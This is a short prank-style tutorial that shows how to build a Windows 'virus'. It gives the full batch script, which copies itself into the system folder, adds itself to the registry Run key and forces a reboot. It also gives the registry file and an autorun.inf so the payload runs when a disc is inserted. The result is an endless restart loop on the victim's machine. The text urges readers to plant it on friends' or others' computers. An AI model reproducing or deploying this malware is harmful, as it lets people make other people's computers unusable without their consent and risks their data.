Virus to Restart system

This Virus plans itself in your computer and in the registry. It restarts your computer instantly and then it restarts your computer every time it starts up. Causing a continuos loop.

How to make it:

1. Open up a notepad and type the following:

@echo off copy lol.bat "C:\WINDOWS\system\" /y regedit /s "lol.reg" shutdown -f -r

a) @echo off - Makes the code invisible.

b) copy lol.bat "C:\WINDOWS\system\" /y - Automatically(/y) copies itself to the "system" folder automatically.

c) regedit /s "lol.reg" - Automatically(/s) runs the .reg file that you will make in step 3.

d)shutdown -f -r - Automatically(-f) shuts down and restarts(-r) the computer.

2. Save it in a folder on your desktop or somewhere as "lol.bat".

3. Open up another notepad and type the following:

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] "lol"="C:\\WINDOWS\\system\\lol.bat"

a)[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run] - The startup folder in the registry (everything in there runs on startup.)

b)"lol"="C:\\WINDOWS\\system\\lol.bat" - "lol" is what the string will be called the path is where your .bat file copied itself, remember.

4. Save it in the same folder as "lol.bat", call it "lol.reg".

5. Give it to your friends.

Make an autorun file and copy it to disc along with the .bat and the .reg.

6. Open up a notepad and type the following:

[autorun] ShellExecute=lol.bat icon=apc.ico

a)ShellExecute=lol.bat - Automatically runs "lol.bat" when you pop your cd/dvd into the drive.

7. Save this into the same folder as "lol.bat" & "lol.reg", call it "autorun.inf".

8. Copy "lol.bat", "lol.reg" & "autorun.inf" to a blank cd or dvd.

9. Stick it into someone's computer for epic lulz.


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